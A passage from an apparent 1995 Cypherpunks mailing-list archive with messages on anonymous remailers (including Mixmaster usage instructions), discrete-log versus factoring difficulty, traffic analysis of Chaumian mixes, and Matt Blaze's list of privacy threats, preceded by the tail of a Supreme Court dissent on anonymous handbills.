uninvited door-to-door canvassing as an invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). Is this less restrictive than complete freedom of distribution -- regardless of content -- of a signed handbill? And commercial handbills may be declared verboten, Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content or identification. Is Talley's anonymous handbill, designed to destroy the business of a commercial establishment, passed out at its very front door, and attacking its then lawful commercial practices, more comportable with First Amendment freedoms? I think not. Before we may expect international responsibility among nations, might not it be well to require individual responsibility at home? Los Angeles' ordinance does no more. Contrary to petitioner's contention, the ordinance as applied does not arbitrarily deprive him of equal protection of the law. He complains that handbills are singled out, while other printed media -- books, magazines, and newspapers -- remain unrestrained. However, "the problem of legislative classification is a perennial one, admitting of no doctrinaire definition. Evils in the same field may be of different dimensions and proportions, requiring different remedies. . . . Or the reform may take one step at a time, addressing itself to the phase of the problem which seems most acute to the legislative mind. . . . The prohibition of the Equal Protection Clause goes no further than the invidious discrimination. [I] cannot say that that point has been reached here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). I dissent. Footnotes n1 "When it is shown that state action threatens significantly to impinge upon constitutionally protected freedom it becomes the duty of this Court to determine whether the action bears a reasonable relationship to the achievement of the governmental purpose asserted as its justification." 361 U.S., at 525. n2 Thirty-six States have statutes prohibiting the anonymous distribution of materials relating to elections. E. g.: Kan. Gen. Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev. Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546. ******************************************** David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org Washington, DC 20003 * HTTP://epic.digicash.com/epic ********************************************** -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLx7L1d6pT6nCx/9/AQHhQwP+PcbJgT5Eyx+9TNIoOSMQJXnnlT0iiHM1 qhKC4Xg2ZZl4/u1Pe927S3UfDXoEunoSAOaq1hgi8c4Wjd31XPM5wFHRdE18/UWZ RXLmLQ+qT6MIFQIicOs6bpDeLCusqT3SF1krViIpIwqscwcdRgu8t1IUbfMVC/6w oFsKqF3fj7o= =XCRK -----END PGP SIGNATURE----- From root at einstein.ssz.com Thu Jan 19 20:39:08 1995 From: root at einstein.ssz.com (root) Date: Thu, 19 Jan 95 20:39:08 PST Subject: stjude? In-Reply-To: <199501200427.UAA16720@well.sf.ca.us> Message-ID: <199501200441.WAA03899@einstein.ssz.com> > > > i'm not on the list because i'm writing 2 books, but i have root in the > solar system, true, and i did come up with the name cypherpunk one morning > as i was washing my cat... hit me like a meteorite... cypherpunk... yes... > Now wait just one second here....I have root at Solar Soyuz Zaibatsu and that is about as close to the solar system as you can get.....you stole the passwords......somebody call the net cops !!!!! From blancw at pylon.com Thu Jan 19 20:46:04 1995 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 19 Jan 95 20:46:04 PST Subject: T.A.Z. on Disk Message-ID: <199501200446.UAA04577@deepthought.pylon.com> I just sent this email to Sandy Sandfort, and he suggested I share it with the list: ------------------- I was just at BlockBuster Music store this evening and happened to go by the 'H's in the Rock Music section - and saw Hakim Bey's name. Yes, there is a CD names T.A.Z *. Blockbuster allows customers to listen to CDs before they buy, so I listened to it. Hakim actually reads several chapters from his book, and there is odd music at the introduction and in the background while he reads. He has a very nice, deep, clear voice. I guess you could say this is one of those self-help books-on-tape - sort of a "save time & become an anarchist while you drive" CD. *T.A.Z. = The Autonomous Zone .. Blanc From bal at martigny.ai.mit.edu Thu Jan 19 21:16:42 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Thu, 19 Jan 95 21:16:42 PST Subject: Factorisation and Discrete Logs In-Reply-To: <199501190440.UAA28769@netcom5.netcom.com> Message-ID: <9501200516.AA28512@toad.com> From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Jan 1995 20:40:46 -0800 (PST) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1017 Sender: owner-cypherpunks at toad.com Precedence: bulk Derek Atkins writes: > You are right... Given talks Ive had with Brian LaMacchia, > who broke a version of "Secure SunRPC" (a 192-bit prime), he > claims that the difficulty is reducing a D-L problem is > about the same amount of computation to factorize an RSA > modulus of approximately the same size.. Just to clarify, the estimate I give people is that computing discrete logs in a prime field GF(p) is about as hard as factoring a number 10 digits (33 bits) longer than p. This estimate is based on the empirical data Andrew Odlyzko and I collected for 192-bit and 224-bit moduli. To the best of my knowledge no one has attempted a discrete log modulus larger than 224 bits. (There just haven't been any juicy targets recently to attack...) Although DH and RSA are believed to be of approximately equal difficulty given the same number of bits, DH is additionally vulnerable because system designers usually publish an "official" modulus and primitive root for everyone to use, whereas in RSA, everyone has their own key. This is not a property of D-H key exchange, per se, but of the actual uses to which people have put the D-H protocol. Two parties wishing to generate a shared secret could certainly produce a D-H modulus and generator on the fly for one-time use, but that takes some time. The fact that the discrete log problem is brittle simply means that you have to choose your modulus taking a few more things into account when using the D-H protocol for a particular application. To mount an attack on PGP, for instance, you must factor a key for each person whose privacy you wish to compromise. Breaking Sun's published 192 bit DH modulus instantly broke SunRPC on all machines using the protocol. The latter was a lot less work than the former. Breaking SunRPC was a lot less work than breaking a (typical) PGP key simply because the SunRPC modulus was so small. If I'm given a choice of factoring 100 different 512-bit PGP keys (for 100 different users) or breaking a 768-bit D-H modulus that compromises all 100 users simultaneously, I'll take the factoring problems. --bal From blancw at pylon.com Thu Jan 19 22:05:30 1995 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 19 Jan 95 22:05:30 PST Subject: Ask Bill Message-ID: <199501200606.WAA05378@deepthought.pylon.com> Bill Gates now has an address for questions - askbill at microsoft.com He has a column which is published every other Wednesday In the local Seattle Post-Intelligencer, where he answers a few of the questions which he finds in that mailbox address. He says he will not reply to questions personally (only in the column), but you never know - a few of you special people could burn his ear and perhaps elicit one to yourself (or perhaps even to the list!) .. Blanc From lmccarth at ducie.cs.umass.edu Thu Jan 19 22:21:55 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 19 Jan 95 22:21:55 PST Subject: Julf operates anon.penet.fi In-Reply-To: Message-ID: <199501200623.BAA25299@ducie.cs.umass.edu> Nathan writes: > sez it all likewise From weidai at eskimo.com Thu Jan 19 22:43:25 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 19 Jan 95 22:43:25 PST Subject: The Remailer Crisis In-Reply-To: <199501200105.RAA05837@infinity.c2.org> Message-ID: On Thu, 19 Jan 1995, sameer wrote: > To my knowledge there exists 3 packages which allow you to run > a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance > Cottrell?), and the simple package available on ftp.csua.berkeley.edu, > which derives from Eric and Hal's original code. Can anyone give an overview of the remailer packages that are currently available? What features and differences do they have, and where to get them? From weidai at eskimo.com Thu Jan 19 22:52:53 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 19 Jan 95 22:52:53 PST Subject: traffic analyzing Chaum's digital mix Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have been thinking about the problem of traffic analysis of a remailer. More specifically, the problem is how can Eve trace Bob, who is communicating with Alice through an ideal Chaumian digital mix? (As most of you know, current remailers are missing many of the features of the digital mix Chaum specified in his CACM paper (at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/papers/chaum.digital-mix.gz ), thus making them extremely vulnerable to anyone with non-trivial resources.) The simplifying assumptions I use here are: 1. there is one mix, which is perfectly secure and trustworthy (note that multiple mixes do not increase untracebility over a single mix if it is perfectly secure and trustworthy) 2. anyone can monitor all traffic in and out of the mix, but no one can link an incoming message with an outgoing one The basic approach is to use this raw traffic information to calculate a SCORE for each user of the remailer with respect to Alice, where the user with the highest SCORE is the person Alice is most probably communicating with. The idea is that with a Chaumian mix, every time Alice sends a message to Bob there is always a pattern of Alice sending a message to the mix, followed by Bob receiving a message from the mix during the next batch. By counting the number of such correlations for each user over a period of time, and taking into account the fact that users who receive more messages from the mix will have higher numbers of coincidental correlations, a SCORE can be calculated so that it would be a good indication over the long run of the probability that a particular user is communicating with Alice. For a digital mix that does batching based on a fixed number of incoming messages, the SCORE for a user U can be calculated in the following way: 1. for each mix batch i, calculate P(i)=lesser(# of messages sent by Alice, # of messages subsequently received by user U) 2. after a period of time t, calculate Q=sum(P(i)) 3. calculate the average value of Q of users with similar usage patterns as user U 4. SCORE(U) = Q / average(Q) Now whether or not this approach actually works depends on whether the number of users with SCORE higher than Bob's SCORE converges to 0 as time t increases, and how quickly it converges. Answering these two questions will require modeling the usage patterns of Alice, Bob, and the mix as a whole. I'll try to do this for some simple cases in a later post. Wei Dai -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx9V8Tl0sXKgdnV5AQFg2gQAhEJ1wgf/XaqMOlVcvYfwgOeR2cKPPyQM fitAJdXKkEXvTtUa3biByvVK86SLQmW/0cLME76UsmaMUY+FVncBoKwlRGKJnDci 6b7VtEW2ZkZKntUieTXFaVbSgI5XL/lIqQu2FFS6wuxH1KayxFeDLiTD6HWfa8t6 sedGrTb5f2I= =Vjum -----END PGP SIGNATURE----- From s675570 at aix1.uottawa.ca Thu Jan 19 23:15:34 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Thu, 19 Jan 95 23:15:34 PST Subject: T.A.Z. on Disk In-Reply-To: <199501200446.UAA04577@deepthought.pylon.com> Message-ID: The book "Temporary Autonomous Zone" is available online at wiretap.spies.com The most recent issue of Mondo 2000 talks about the CD with Hakim Bey and the producer. I also saw another e-book site that had some more of his stuff, can't remember what it was though. Of course, one could always just buy them on paper (remember that?) From erc at s116.slcslip.indirect.com Thu Jan 19 23:41:18 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Thu, 19 Jan 95 23:41:18 PST Subject: Remailer-on-a-CD In-Reply-To: <9501191924.AA17670@toad.com> Message-ID: > >The "Linux mavens" followed by the "black box" stuff sparked an idea... > > >package. To make it as easy as possible, I'd use the UMSDOS filesystem so > >that Linux could be installed on a DOS machine without any reformatting > >repartitioning, or similar headaches. > > >distribution already has) and some boot options, you'd have an "instant > >remailer" software package, able to transform any 386SX/4MB RAM DOS macine > >or better into a Linux-based remailer site, complete with aliases, loggng If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare- bones Linux set that will install right in a DOS filesystem (it's a .ZIP file). It's intended for SLIP clients, but it could easily be adapted for setting up an "instant remailer". -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** Cop: "How many beers have you had tonight, bro?" Suspect: "Seventy." -- from the TV show "Cops" From mab at research.att.com Fri Jan 20 00:34:57 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 20 Jan 95 00:34:57 PST Subject: Threats in real life - what are we worried about? Message-ID: <9501200836.AA19977@merckx.info.att.com> I wrote: > > Given existing crypto tools (PGP, etc), what are the top ten > practical attacks against the privacy of stored data and > electronic mail? Who are the bad guys? What tools do we need > to limit these threats? > >I'll post my own thoughts later. > Matt's Top Ten Underappreciated Threats to Privacy on the Internet ================================================================== 1. The sorry state of software. Everyone knows that nobody knows how to write software. Modern systems give hundreds of thousands of lines of code the chance to violate security policy. How can we be sure that the software we trust does the right thing? How can we reduce the opportunities for problems? 2. Ineffective protection against denial of service attacks. While not a direct threat to privacy, the ease with which almost anyone can mount effective denial of service attacks threatens the ability to deploy anonymous services. You'll note that no one worries very much about the millions of anonymous entry points to more robust networks like the telephone system or the postal service, where it's relatively hard (and expensive) for an individual to cause large-scale service disruption. How can we make the 'net robust enough to withstand mailbombs and newsgroup spamming? 3. Poor secret storage on networked computers. Cryptosystems allow you to manage large secrets by protecting smaller ones (keys). Unfortunately, modern computers are awful at protecting even the smallest secrets. Multi-user networked workstations can be broken into and their memories compromised. Standalone, single-user machines can be stolen or compromised through viruses that leak secrets asynchronously. What are the right mechanisms for storing and managing keys on various platforms? Remote servers, where there may be no user available to enter a passphrase (but see threat #5, below), are an especially hard problem. 4. Poorly understood random number generation techniques. Keys and session variables need good sources of unpredictable bits. Currently used techniques (like event inter-arrival times) are only marginally well understood and depend to a great deal on low-level characteristics of the platforms on which they are run. We need a wider range of techniques (especially ones that work without relying on user input), and to better understand their risks and failure modes. Some interesting ideas have been proposed that deserve further study. At CRYPTO '94 there was an interesting paper on using disk airflow variation to get random bits. Another interesting technique, first proposed by Don Mitchell, involves exploiting clock skew. Here's a C program that seems to produce one pretty random bit per second on most platforms. How good are the bits? Can we get more bandwidth out of it? #include #include int count=0; void printbit() { signal(SIGALRM,printbit); alarm(1); printf("%1d",count&01); fflush(stdout); } main() { signal(SIGALRM,printbit); alarm(1); while (1) count++; } 5. Weak passphrases. Most crypto software addresses the key storage and key generation problems by relying on user-generated passphrase strings, which are presumed to contain enough entropy to produce good key material and are also easy enough to remember that they do not require secure storage. While dictionary attacks are a well known problem with short passwords, much less is known about lines of attack against user- selected passphrase-based keys. Shannon tells us that English text has just over 1 bit of entropy per character, which would seem to leave most passphrases well within reach of brute-force search. Less is known, however, about good techniques for enumerating passphrases in order to exploit low entropy. Until we have a better understanding of how to attack passphrases, we really have no idea how weak or strong they are. 6. Limited support for remote trusted agents. Almost all currently available cryptographic software assumes that the user is in direct control over the systems on which they run and has a secure path to it. For example, the interfaces to programs like PGP and CFS assume that their input is comes from the user over a secure path like the local console. This is not always the case, of course; consider the problem of reading your mail remotely when logged in over the Internet. We need better mechanisms for transferring the trusted operations to the local trusted machine while keeping the logical operations (like where the mail is) where they logically belong. 7. Poorly understood protocol and service interactions. Features frequently come back to bite us, and its hard to know even where to look. The Internet worm was propagated via an obscure and innocent-looking feature in sendmail; how many more features in how many more programs have unexpected consequences just waiting to be discovered? Is the conventional wisdom of hiding behind firewalls and turning off services really the only answer? 8. Lack of scalable security infrastructure. No comment... 9. Poorly understood "out of band" attack risks. Security people tend to focus on what's easy to model. Unfortunately, attackers focus on what's easy to exploit. We need a better understanding of just how easy some non-traditional attacks are. Most of the answers are probably too scary to think about. How long do our keys need to be in the face of electromagnetic radiation, physical monitoring, Trojan horses, social engineering, and so on and so on? 10. No broad-based demand for security. This is a well-known problem among almost everyone who has tied his or her fortune to selling security products and services. Until there is widespread demand for transparent security, the tools and infrastructure needed to support it will be expensive and inaccessible to many applications. This is partly a problem of understanding the threats and risks in real applications, and of building systems that include security as a basic feature rather than as a later "add on". There's a lot missing from this list, and a lot you can disagree with among the things that are on it. Flame away... -matt From david.lloyd-jones at canrem.com Fri Jan 20 00:36:44 1995 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Fri, 20 Jan 95 00:36:44 PST Subject: ELECTRONIC CASH ILLEG Message-ID: <60.19099.6525.0C1CA93D@canrem.com> Thomas Grant Edwards writes: TS+Actually, the "backing" of a fiat currency is the need to have some +around to pay your taxes, else you go to jail. You are taxed on many +types of income, even if they are not directly exchanged in the fiat +currency. Somehow you have to get some. This is pretty much true, but does not logically justify your conclusion: TS+This also means that higher taxes can make the currency more >desirable, +lower taxes less, higher government spending less, lower government +spending more, etc. This is only somewhat true. The most important factor is that currencies are traded on a fairly free market. This means supply and demand, not any firm intrinsic qualities of anything, dominate. If a country is running a positive net balance, whether by trade, capital investment, or influx of rich refugees, there will be a demand for its funnypaper, and that paper's price, in other currencies will rise. The same will apply to currencies not attached to countries -- such as the NetCredit, which I am working to put into reticulation. That's electronic for "circulation". :-) The hardest currencies, roughly in order, are those of Switzerland, Taiwan, and Japan. Germany is no longer on the list because Kohl bought the second last election in the most expensive bit of bribery in the history of democratic politics: the couple of trillion dollars he spent by assigning par value to the OstMark. Hong Kong is not on the list because of the huge outflows for the development of China, which tends to balance supply and demand at a lower/softer level than it would otherwise have. The US is no longer on the list because Reagan booted the whole thing into the can. Best, -dlj. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies. From lmccarth at ducie.cs.umass.edu Fri Jan 20 00:53:20 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 20 Jan 95 00:53:20 PST Subject: Remailer Software Sites/Comparison Message-ID: <199501200858.DAA05727@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Wei Dai writes: > Can anyone give an overview of the remailer packages that are currently > available? What features and differences do they have, and where to get > them? Raph Levien's Remailers WWW page has links to most of the material on the remailer software of which I'm aware: http://http.cs.berkeley.edu/~raph/remailer-list.html The remailer-help file from mixmaster at nately.ucsd.edu gives an ftp directory from which one may ultimately obtain Lance Cottrell's Mixmaster code, after following an export control process which I assume resembles MIT's method of distributing PGP. Lance sent out a first draft of instructions on the mixing (including packet splitting & recombination) features of Mixmaster to the list a few months ago, which I enclose below. Mixmaster is the latest and most sophisticated of the remailer packages I've seen, so I'd recommend it to anyone looking to install a new remailer in North America. - -L. Futplex McCarthy ===== forwarded message follows =============== Date: Sun, 20 Nov 1994 17:07:02 -0800 To: cypherpunks at toad.com, remailer-operators at c2.org Subject: 1st Draft Mixmaster chaining instructions Sender: owner-cypherpunks at toad.com Precedence: bulk X-Status: [...] Here is the first draft of the instructions for using Mixmaster to build remailer messages. I am posting it to give a flavor of what the program does, and to request comments, both on the features and on the clarity of the help file itself. Instructions for using Mixmaster to create type 2 remailer messages. I assume that you have either compiled Mixmaster, or that you have acquired a precompiled copy. While you do not need PGP to use Mixmaster, it is useful for key management, and is required if you desire security of the content of the message you are sending (which will be visible to the last remailer). Theory and purpose of remailers: The purpose of anonymous remailers (hereafter simply remailers), is to provide protection against traffic analysis. Traffic analysis is the study of who you are communicating with, when, and how often. This reveals more than you might expect about your activities. It will indicate who your friends and colleagues are (and they can be told apart by looking at the times you contact them). What your interests are, from which catalog companies you contact, and which ftp and WWW sites you visit. Traffic analysis can even reveal business secrets, e.g. your frequent contact with a rival could give hints of an impending merger. Remailers protect your email from traffic analysis. The original remailers did this by removing all headers, except the subject line, from any message you sent to them and then forwarding them a destination of your choice. The recipient of such a message would not know who had sent it. The addition of encryption to this scheme gave significant protection from attackers who simply look at passing messages for to and from fields. Passing a message through several remailers in a row is much better, but still vulnerable to an attacker who can watch messages go into and out of each remailer. Two more elements are required: messages must be reordered within the remailer before being forwarded (this is being done by a few of the old style remailers), and all messages must be indistinguishable. This last is the primary improvement with the type 2 remailer, Mixmaster. Using type 2 remailers: The trend towards ever more complicated remailer message formats has been clear for some time. Several programs have been written to automatically build messages which will be remailed by several remailers. This process is called chaining. With type 2 remailers it is no longer possible to create these messages by hand. Mixmaster takes a message you wish to send, a list of remailers to chain it through, and a final destination, and builds the packet which the remailers will use. For simplicity I will first describe the interactive use of Mixmaster, then I will discuss how it can be controlled through command line arguments. Interactive use of Mixmaster: If you run Mixmaster with no arguments, you will be prompted for all the required information. First you will be asked to specify the final destination of the message. This is the full email address where you want your message delivered. Remember that the message is being sent by the last remailer in the chain, so you must specify the full internet address (e.g. name at machine.place.com), you may not use local mail aliases. You may enter multiple recipients on separate lines. Hit return on a blank line to stop entering destinations. You must have at least one. Next you will be asked to enter any headers you want to have inserted before the message. These are those lines at the beginning of email messages, like From: fred at bedrock.univ.edu, or Subject: Party invitation. If you want your message to have a subject when it is delivered, you must enter a line Subject: your subject here. Note that Subject must be capitalized, with the : and space as shown. A subject header can be added by using the -s command line argument. When you are done entering headers, hit return (it is OK to have zero headers). You will now be presented with a list of remailers through which you can chain your messages. The order in which you choose them is the order in which they will be traversed by your message. You may choose up to 20 of them, but remember that the reliability and speed of the chain diminish as the number of remailers in the chain increases. Four is a reasonable number of remailers to use. It is fine to use a given remailer more than once in your chain. Press return on a blank line to stop entering remailers. Finally you will be asked what file you want to send. This must be an ASCII file. You may either enter the name of an existing file, or you may choose to enter the message directly by typing "stdin" as the file name. This is intended for use by scripts. There are no editing capabilities when using stdin. Enter the end of file character (EOF is ^D) when you are done entering the file. Mixmaster will now build the type 2 remailer packet, and send it to the first remailer in the chain. Command line arguments to Mixmaster: Mixmaster [-c] [in.filename] [-f] [-s "subject"] [-o "outfile"] [-to a at b.com] [-l 3 2 6 ...] -c this indicates that chaining rather than remailer functions are desired. It is a NOP since chaining is the default operation. "filename" if a filename is given, then this will be used as the input file. As in the interactive mode, you may choose "stdin". No filename will be prompted for. -f filter mode. All prompts suppressed, but input still accepted as described in the interactive section. The remailer list must be specified on the command line. -s "subject" Adds a subject line to the message. The user should NOT include Subject: in this string. Mixmaster will not prompt for other headers if -s is used. -o "outfile" Specify an output file rather than sending the message to the first remailer automatically. If outfile is "stdout", then the remailer packet will be printed to stdout. -to foo at bar.org specifies the final destination of the message. Only one destination can be specified. Mixmaster will not prompt for other destinations if -to is used. -l 4 3 5 ... Specifies the list of remailers to chain through. This must be the last argument on the command line. A maximum of 20 remailers may be specified. Mixmaster will not prompt for other remailers if -l is used. - -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. [...] - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx97BioZzwIn1bdtAQEMvQF/RlnlugSboXC/+LtZoyfVm4Blc4/do0re 59XYOo7Vs/AQRWLZU4iM8h65axpr7G3f =VW+M -----END PGP SIGNATURE----- From aba at dcs.exeter.ac.uk Fri Jan 20 03:34:50 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Fri, 20 Jan 95 03:34:50 PST Subject: Netscape, RC4, key exchange? Message-ID: <19875.9501201052@exe.dcs.exeter.ac.uk> -----BEGIN PGP SIGNED MESSAGE----- grendel at netaxs.com wrote: > aba at atlas.ex.ac.uk wrote: > > I have code to generate the RSA key pairs and modulus, what I am > > looking for is code to factorise a number using one of the better > > algorithms (quadratic sieve, etc.). > > It's been established that the encryption in Netscape is 40 bit >RC4, not 40 bit RSA, [...] Ok, so Netscape (the exported version only?) uses 40bit RC4 for encryption, but what about key exchange? RC4 is a stream cypher so both the receiver and sender need to know the key. Does anybody know what method Netscape uses to exchange keys DH, RSA, other? and what key sizes? Adam -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUALx+TkSnIuJ1VakpnAQEuBQP/TAiX81goT8r3KnvFh3WCm6TvzjUNAaEl G8NI5ELom8CWgIYp1uli+V+s0nRgZCKfZAvfeQrG97p2blSK0tOsZyV3E6cYKgXo yGcGUJZ8UdvBL0A93LJcU4LZEUITcC9/3HS09QD2oZBGzSettHk3nwKMmEer65OU QLsrRildnuw= =3vQF -----END PGP SIGNATURE----- From caj at tower.stc.housing.washington.edu Fri Jan 20 04:09:42 1995 From: caj at tower.stc.housing.washington.edu (Craig A. Johnston) Date: Fri, 20 Jan 95 04:09:42 PST Subject: remailer questions Message-ID: <199501201209.EAA01188@tower.stc.housing.washington.edu> Ok, I'm planning on putting up a remailer on my Linux box. One of the things I'd really like to know is, how much in the way of attempts to break into your machines are remailer ops seeing? How much in the way of other attacks? I'd also like to get some idea of the amt of resources consumed by a relatively popular remailer -- amt of system loading, disk space devoted to remailing activites, and anything else. I know loading will be hard to quantify in a meaningful way, but for reference my machine is a 486/66 w/32 megs RAM and pretty fast SCSI disks. Just a general idea of how significant the load on such a machine will be would be nice. My SCSI and Ethernet are both fast, and on a PCI bus. My site is at the moment, I think, relatively secure. I have few users and am sure at the moment nobody has an easily crackable password. I plant to install a fascist password checker soon. I currently have ftpd and fingerd commented out of my inetd.conf. (I plan to put ftpd back, at some point, but really don't like outsiders being able do a finger @site and find out who is on, how long, how long idle, find out when users last logged on or read their mail, etc. I will probably want to add it back after modifying it or finding a stock one that does what I want.) I have tcp wrappers installed, and have checked on a number of blatant security holes that I know of. I am worried that once I begin running a remailer, the number of attacks on my machine will increase dramatically. I'd of course like for my data and my users' data to remain private, and believe that a compromised remailer is (obviously) worse than no remailer at all. What would be nice, before I put up a remailer, would be to have any willing, security-knowledgeable cypherpunk subscribers out there to probe my machine for any really obvious chinks, for security-aware Linux users to point out any Linux or Slackware-specific security holes, etc. Of course I'd want to have a word with anyone willing to probe me before they just went at it... ;) Linux kernel is currently 1.1.81, which is quite stable for me, and the Slackware distribution is 1.2.0. I'm running sendmail 8.6.9, are there any really terrible vulnerabilities in it any longer from outside the machine? From inside? Of course, I'm on an Ethernet with others, and have users logging in from other Ethernets, so am vulnerable to sniffers. I don't think it's going to be feasible to install skey here, as a number of my users are extremely non-technical. I'm also still looking around for what I'm going to run. I'd like for it to be easy to reply to users, but absolutely impossible for me to 'out' anyone under any circumstances. The encrypted-sender stuff some remailers currently use is probably too ugly for most average joes to want to use, and not as secure as I'd like. It's probably the best available at the moment. This should definitely change. What I'd *really* like to do would be to write a client and server to make an anonymous pool act like normal email ... this is really the only way I can think of to make replying easy but also to have good security. I'm sort of surprised someone has not done this yet. It'd be pseudonymous, your client would only look at messages for you or for everyone (for your convenience -- of course anyone could look at anything, but it'll all be PGP'ed, so...) Some really neat things that could be done w/this... for folks willing to trust the sever to some degree, cross-referencing of pseudonyms and public keys could be done, allowing joe user to just mail to a pseudonym -- this would be good in cases where one party wishes to hide, while the other has nothing to hide and is possibly very non-technical. He'd have no guarantee that someone wasn't reading his mail to the pseudonymous party, on the way in, but the p.n. party would not have to worry about having his real address cross-referenced, or about the server having the key to decrypt his real (included) address in memory or on disk. Anon pools are obviously doable right now, with a mailing list, but the inconvenience of using one like this is a real barrier. An anonymous pool; Usenet-like -- distributed over many machines in many countries, but with pseudonyms instead of "real names" and public keys as addresses. This is definitely doable, right now. NNTP-type servers doing news and mail service. As the scale got larger, we'd of course not want to send everyone's mail to all the servers, but tying a user down only as far as to a given server would probably not be a problem -- look at all the different folks that may use one NNTP server. Perhaps mail for a given user could be sent to several different servers to keep things muddy. Mixmaster does not currently run on Linux, is that correct? Anyone know what the problem is, or have an idea what amt of work would be involved in porting it? I'd like to look at this. Really, though, everything out there is pretty unsatisfactory -- only anonymous pools and DC-nets have the characteristics I'm interested in. Anyone on the list doing any serious work on DC-nets? I find these extremely exciting, and don't see much brainstoming on implementation going on. regards, Craig. From caj at tower.stc.housing.washington.edu Fri Jan 20 04:29:02 1995 From: caj at tower.stc.housing.washington.edu (Craig A. Johnston) Date: Fri, 20 Jan 95 04:29:02 PST Subject: remailer questions In-Reply-To: <199501201209.EAA01188@tower.stc.housing.washington.edu> Message-ID: <199501201228.EAA01257@tower.stc.housing.washington.edu> > > Linux kernel is currently 1.1.81, which is quite stable for me, > and the Slackware distribution is 1.2.0. Errata: make that 2.1.0 -Craig From s675570 at aix1.uottawa.ca Fri Jan 20 05:28:37 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Fri, 20 Jan 95 05:28:37 PST Subject: T.A.Z. on Disk In-Reply-To: Message-ID: On Fri, 20 Jan 1995, Charles Bell wrote: > > > > The book "Temporary Autonomous Zone" is available online at wiretap.spies.com > > Available how, exactly? Sorry about that. The hazards of being brief, I guess (never post when you're half asleep). Gopher and ftp work for the same address on this one. /Library/Documents/taz.txt is good for ftp, or try the /Electronic Books at Wiretap heading on the first menu, if you use gopher. The pointers to the other etext sites might lead you to his other stuff (there were two others as far as I can remember). From frissell at panix.com Fri Jan 20 06:22:45 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 20 Jan 95 06:22:45 PST Subject: Crypto Anarchy/Libertarians in WSJ Message-ID: <199501201418.AA10378@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Today's WSJ Front Page Left Column Less Is More Libertarian Impulses Show Growing Appeal Among the Disaffected When the Government Fails Many Voters are Asking: Who Needs it Anyway? Mixed Blessing to the GOP "Mr. Frezza...doesn't just want to cut government: He questions the very need for most of it. He figures that in a world in which computer wizards are close to creating their own private, encrypted digital cash system for making transactions without any government involvement, the need for centralized authority is shrivling." DCF -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx/FiIVO4r4sgSPhAQEhmgP/dxCXAPS6iu/Zb9P7AuC6D8aDg94vZABs VjlXXXXWjkHedveIjQ9qdU8xELblzZiMlu35SKKygLvsD2a8bNXiC2FxBnA/H716 Dj4UHksctV3wJSZuwq6z8/fZds0Dg5GJLYbAUrbdInp/tM7TMrAhUVLFVkVpzhzk 25aXzmIiv5U= =4FOR -----END PGP SIGNATURE----- ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From dmandl at bear.com Fri Jan 20 06:27:56 1995 From: dmandl at bear.com (David Mandl) Date: Fri, 20 Jan 95 06:27:56 PST Subject: T.A.Z. on Disk Message-ID: <9501201424.AA11493@yeti.bsnet> > From: blancw at pylon.com > > *T.A.Z. = The Autonomous Zone T.A.Z. = Temporary Autonomous Zone --Dave. From dmandl at bear.com Fri Jan 20 06:28:01 1995 From: dmandl at bear.com (David Mandl) Date: Fri, 20 Jan 95 06:28:01 PST Subject: T.A.Z. on Disk Message-ID: <9501201422.AA11305@yeti.bsnet> There's a Hakim Bey web site with the full text of TAZ and a bunch of other things, including the pamphlet "Radio Sermonettes" and various other essays. I've got the URL at home, so I can post it to the list tonight (sorry, but it's easier than asking people to email me for it individually). The text, at that site at least, is the absolutely authorized original (from our original files). I've got other odds and ends by H.B. that have never been made available on the net which I may or may not get around to posting in the next few weeks. The followup to 